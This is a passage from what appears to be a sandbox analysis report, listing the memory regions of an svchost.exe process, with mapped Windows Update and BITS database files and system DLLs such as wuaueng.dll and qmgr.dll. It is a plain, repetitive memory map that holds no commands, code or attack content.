0x76fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1550 start_va = 0x7700000 end_va = 0x7759fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wsmres.dll.mui" filename = "\\Windows\\System32\\en-US\\WsmRes.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wsmres.dll.mui") Region: id = 1551 start_va = 0x7760000 end_va = 0x785ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007760000" filename = "" Region: id = 1552 start_va = 0x7860000 end_va = 0x795ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007860000" filename = "" Region: id = 1553 start_va = 0x7960000 end_va = 0x796ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1554 start_va = 0x7970000 end_va = 0x797ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1555 start_va = 0x7980000 end_va = 0x798ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1556 start_va = 0x7990000 end_va = 0x799ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1557 start_va = 0x79a0000 end_va = 0x79affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1558 start_va = 0x79b0000 end_va = 0x79bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1559 start_va = 0x79c0000 end_va = 0x79cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1560 start_va = 0x79d0000 end_va = 0x79dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1561 start_va = 0x79e0000 end_va = 0x79effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1562 start_va = 0x79f0000 end_va = 0x79fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1563 start_va = 0x7a00000 end_va = 0x7a0ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1564 start_va = 0x7a10000 end_va = 0x7a1ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1565 start_va = 0x7a20000 end_va = 0x7a2ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1566 start_va = 0x7a30000 end_va = 0x7a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1567 start_va = 0x7a40000 end_va = 0x7a4ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1568 start_va = 0x7a50000 end_va = 0x7a5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1569 start_va = 0x7a60000 end_va = 0x7a6ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1570 start_va = 0x7a70000 end_va = 0x7a7ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1571 start_va = 0x7a80000 end_va = 0x7a8ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1572 start_va = 0x7a90000 end_va = 0x7a9ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1573 start_va = 0x7aa0000 end_va = 0x7aaffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1574 start_va = 0x7ab0000 end_va = 0x7abffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1575 start_va = 0x7ac0000 end_va = 0x7acffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1576 start_va = 0x7ad0000 end_va = 0x7adffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1577 start_va = 0x7ae0000 end_va = 0x7aeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1578 start_va = 0x7af0000 end_va = 0x7afffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1579 start_va = 0x7b00000 end_va = 0x7b0ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1580 start_va = 0x7b10000 end_va = 0x7b1ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1581 start_va = 0x7b20000 end_va = 0x7b2ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1582 start_va = 0x7b30000 end_va = 0x7b3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1583 start_va = 0x7b40000 end_va = 0x7b4ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1584 start_va = 0x7b50000 end_va = 0x7b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1585 start_va = 0x7b60000 end_va = 0x7b6ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1586 start_va = 0x7b70000 end_va = 0x7b7ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1587 start_va = 0x7b80000 end_va = 0x7b8ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1588 start_va = 0x7b90000 end_va = 0x7b9ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1589 start_va = 0x7ba0000 end_va = 0x7baffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1590 start_va = 0x7bb0000 end_va = 0x7bbffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1591 start_va = 0x7bc0000 end_va = 0x7bcffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1592 start_va = 0x7bd0000 end_va = 0x7bdffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1593 start_va = 0x7be0000 end_va = 0x7beffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1594 start_va = 0x7bf0000 end_va = 0x7bfffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1595 start_va = 0x7c00000 end_va = 0x7c0ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1596 start_va = 0x7c10000 end_va = 0x7d0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c10000" filename = "" Region: id = 1597 start_va = 0x7d10000 end_va = 0x7d13fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007d10000" filename = "" Region: id = 1598 start_va = 0x7d20000 end_va = 0x7d21fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007d20000" filename = "" Region: id = 1599 start_va = 0x7d30000 end_va = 0x7d3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1600 start_va = 0x7d40000 end_va = 0x7e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007d40000" filename = "" Region: id = 1601 start_va = 0x7e40000 end_va = 0x7f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007e40000" filename = "" Region: id = 1602 start_va = 0x7f40000 end_va = 0x7fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007f40000" filename = "" Region: id = 1603 start_va = 0x7fc0000 end_va = 0x7fc1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007fc0000" filename = "" Region: id = 1604 start_va = 0x7fd0000 end_va = 0x7fd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007fd0000" filename = "" Region: id = 1605 start_va = 0x7fe0000 end_va = 0x7feffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "qmgr.db" filename = "\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr.db" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr.db") Region: id = 1606 start_va = 0x7ff0000 end_va = 0x7ffffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "qmgr.db" filename = "\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr.db" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr.db") Region: id = 1607 start_va = 0x8000000 end_va = 0x81fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008000000" filename = "" Region: id = 1608 start_va = 0x8200000 end_va = 0x827ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008200000" filename = "" Region: id = 1609 start_va = 0x8280000 end_va = 0x82fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008280000" filename = "" Region: id = 1610 start_va = 0x8300000 end_va = 0x83fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008300000" filename = "" Region: id = 1611 start_va = 0x8400000 end_va = 0x85fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008400000" filename = "" Region: id = 1612 start_va = 0x8600000 end_va = 0x86fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008600000" filename = "" Region: id = 1613 start_va = 0x8700000 end_va = 0x87fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008700000" filename = "" Region: id = 1614 start_va = 0x8900000 end_va = 0x89fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008900000" filename = "" Region: id = 1615 start_va = 0x8a00000 end_va = 0x8bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008a00000" filename = "" Region: id = 1616 start_va = 0x8c00000 end_va = 0x8c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008c00000" filename = "" Region: id = 1617 start_va = 0x8c80000 end_va = 0x8cdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008c80000" filename = "" Region: id = 1618 start_va = 0x8ce0000 end_va = 0x8ceffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "qmgr.db" filename = "\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr.db" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr.db") Region: id = 1619 start_va = 0x8cf0000 end_va = 0x8cfffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "qmgr.db" filename = "\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr.db" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr.db") Region: id = 1620 start_va = 0x8d00000 end_va = 0x8d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008d00000" filename = "" Region: id = 1621 start_va = 0x8d80000 end_va = 0x8e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008d80000" filename = "" Region: id = 1622 start_va = 0x8e80000 end_va = 0x8efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008e80000" filename = "" Region: id = 1623 start_va = 0x8f00000 end_va = 0x8ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008f00000" filename = "" Region: id = 1624 start_va = 0x9000000 end_va = 0x91fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009000000" filename = "" Region: id = 1625 start_va = 0x9200000 end_va = 0x92fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009200000" filename = "" Region: id = 1626 start_va = 0x9300000 end_va = 0x937ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009300000" filename = "" Region: id = 1627 start_va = 0x9380000 end_va = 0x93fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009380000" filename = "" Region: id = 1628 start_va = 0x9400000 end_va = 0x940ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "qmgr.db" filename = "\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr.db" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr.db") Region: id = 1629 start_va = 0x9410000 end_va = 0x941ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "qmgr.db" filename = "\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr.db" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr.db") Region: id = 1630 start_va = 0x9420000 end_va = 0x942ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "qmgr.db" filename = "\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr.db" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr.db") Region: id = 1631 start_va = 0x9430000 end_va = 0x943ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "qmgr.db" filename = "\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr.db" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr.db") Region: id = 1632 start_va = 0x9440000 end_va = 0x944ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "qmgr.db" filename = "\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr.db" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr.db") Region: id = 1633 start_va = 0x9450000 end_va = 0x945ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "qmgr.db" filename = "\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr.db" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr.db") Region: id = 1634 start_va = 0x9460000 end_va = 0x946ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "qmgr.db" filename = "\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr.db" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr.db") Region: id = 1635 start_va = 0x9470000 end_va = 0x947ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "qmgr.db" filename = "\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr.db" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr.db") Region: id = 1636 start_va = 0x9480000 end_va = 0x948ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "qmgr.db" filename = "\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr.db" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr.db") Region: id = 1637 start_va = 0x9490000 end_va = 0x949ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "qmgr.db" filename = "\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr.db" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr.db") Region: id = 1638 start_va = 0x94a0000 end_va = 0x94affff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "qmgr.db" filename = "\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr.db" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr.db") Region: id = 1639 start_va = 0x94b0000 end_va = 0x94bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "qmgr.db" filename = "\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr.db" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr.db") Region: id = 1640 start_va = 0x94c0000 end_va = 0x94cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "qmgr.db" filename = "\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr.db" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr.db") Region: id = 1641 start_va = 0x94d0000 end_va = 0x94dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "qmgr.db" filename = "\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr.db" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr.db") Region: id = 1642 start_va = 0x94e0000 end_va = 0x955ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000094e0000" filename = "" Region: id = 1643 start_va = 0x9560000 end_va = 0x95dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009560000" filename = "" Region: id = 1644 start_va = 0x95e0000 end_va = 0x96dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000095e0000" filename = "" Region: id = 1645 start_va = 0x9760000 end_va = 0x985ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009760000" filename = "" Region: id = 1646 start_va = 0x9860000 end_va = 0x995ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009860000" filename = "" Region: id = 1647 start_va = 0xa000000 end_va = 0xaffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a000000" filename = "" Region: id = 1648 start_va = 0x7ffe0000 end_va = 0x7ffe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1649 start_va = 0x7ff4fde90000 end_va = 0x7ff4fdf8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff4fde90000" filename = "" Region: id = 1650 start_va = 0x7ff4fdf90000 end_va = 0x7ff5fdfaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff4fdf90000" filename = "" Region: id = 1651 start_va = 0x7ff5fdfb0000 end_va = 0x7ff5fffb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff5fdfb0000" filename = "" Region: id = 1652 start_va = 0x7ff5fffc0000 end_va = 0x7ff5fffc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffc0000" filename = "" Region: id = 1653 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 1654 start_va = 0x7ff612ac0000 end_va = 0x7ff612ad0fff monitored = 0 entry_point = 0x7ff612ac4e80 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1655 start_va = 0x7fff97d60000 end_va = 0x7fff97f8cfff monitored = 0 entry_point = 0x7fff97db2e50 region_type = mapped_file name = "wlidsvc.dll" filename = "\\Windows\\System32\\wlidsvc.dll" (normalized: "c:\\windows\\system32\\wlidsvc.dll") Region: id = 1656 start_va = 0x7fffa7fd0000 end_va = 0x7fffa7fe8fff monitored = 0 entry_point = 0x7fffa7fd4310 region_type = mapped_file name = "elscore.dll" filename = "\\Windows\\System32\\ELSCore.dll" (normalized: "c:\\windows\\system32\\elscore.dll") Region: id = 1657 start_va = 0x7fffa9250000 end_va = 0x7fffa9589fff monitored = 0 entry_point = 0x7fffa935a560 region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 1658 start_va = 0x7fffa9590000 end_va = 0x7fffa9672fff monitored = 0 entry_point = 0x7fffa95b2160 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 1659 start_va = 0x7fffabb00000 end_va = 0x7fffabb5efff monitored = 0 entry_point = 0x7fffabb292a0 region_type = mapped_file name = "pushtoinstall.dll" filename = "\\Windows\\System32\\PushToInstall.dll" (normalized: "c:\\windows\\system32\\pushtoinstall.dll") Region: id = 1660 start_va = 0x7fffabbf0000 end_va = 0x7fffabd5afff monitored = 0 entry_point = 0x7fffabc46ea0 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 1661 start_va = 0x7fffac4b0000 end_va = 0x7fffac75afff monitored = 0 entry_point = 0x7fffac4d60c0 region_type = mapped_file name = "wsmsvc.dll" filename = "\\Windows\\System32\\WsmSvc.dll" (normalized: "c:\\windows\\system32\\wsmsvc.dll") Region: id = 1662 start_va = 0x7fffad2f0000 end_va = 0x7fffad396fff monitored = 0 entry_point = 0x7fffad372140 region_type = mapped_file name = "wpnprv.dll" filename = "\\Windows\\System32\\wpnprv.dll" (normalized: "c:\\windows\\system32\\wpnprv.dll") Region: id = 1663 start_va = 0x7fffadf60000 end_va = 0x7fffadfc7fff monitored = 0 entry_point = 0x7fffadf63d20 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 1664 start_va = 0x7fffae010000 end_va = 0x7fffae038fff monitored = 0 entry_point = 0x7fffae024f80 region_type = mapped_file name = "windows.networking.sockets.pushenabledapplication.dll" filename = "\\Windows\\System32\\Windows.Networking.Sockets.PushEnabledApplication.dll" (normalized: "c:\\windows\\system32\\windows.networking.sockets.pushenabledapplication.dll") Region: id = 1665 start_va = 0x7fffae040000 end_va = 0x7fffae06ffff monitored = 0 entry_point = 0x7fffae0532c0 region_type = mapped_file name = "wsmauto.dll" filename = "\\Windows\\System32\\WsmAuto.dll" (normalized: "c:\\windows\\system32\\wsmauto.dll") Region: id = 1666 start_va = 0x7fffaec50000 end_va = 0x7fffaec6afff monitored = 0 entry_point = 0x7fffaec559c0 region_type = mapped_file name = "tbs.dll" filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll") Region: id = 1667 start_va = 0x7fffaecd0000 end_va = 0x7fffaed09fff monitored = 0 entry_point = 0x7fffaecd8d70 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 1668 start_va = 0x7fffaf150000 end_va = 0x7fffaf241fff monitored = 0 entry_point = 0x7fffaf168ad0 region_type = mapped_file name = "windows.security.authentication.onlineid.dll" filename = "\\Windows\\System32\\Windows.Security.Authentication.OnlineId.dll" (normalized: "c:\\windows\\system32\\windows.security.authentication.onlineid.dll") Region: id = 1669 start_va = 0x7fffb1820000 end_va = 0x7fffb1830fff monitored = 0 entry_point = 0x7fffb1826910 region_type = mapped_file name = "dusmapi.dll" filename = "\\Windows\\System32\\dusmapi.dll" (normalized: "c:\\windows\\system32\\dusmapi.dll") Region: id = 1670 start_va = 0x7fffb3040000 end_va = 0x7fffb3070fff monitored = 0 entry_point = 0x7fffb304e9a0 region_type = mapped_file name = "cryptnet.dll" filename = "\\Windows\\System32\\cryptnet.dll" (normalized: "c:\\windows\\system32\\cryptnet.dll") Region: id = 1671 start_va = 0x7fffb3940000 end_va = 0x7fffb39affff monitored = 0 entry_point = 0x7fffb3953d40 region_type = mapped_file name = "cryptngc.dll" filename = "\\Windows\\System32\\cryptngc.dll" (normalized: "c:\\windows\\system32\\cryptngc.dll") Region: id = 1672 start_va = 0x7fffb4270000 end_va = 0x7fffb42f2fff monitored = 0 entry_point = 0x7fffb42977a0 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 1673 start_va = 0x7fffb4300000 end_va = 0x7fffb4317fff monitored = 0 entry_point = 0x7fffb4305be0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 1674 start_va = 0x7fffb4320000 end_va = 0x7fffb43f6fff monitored = 0 entry_point = 0x7fffb43434d0 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: 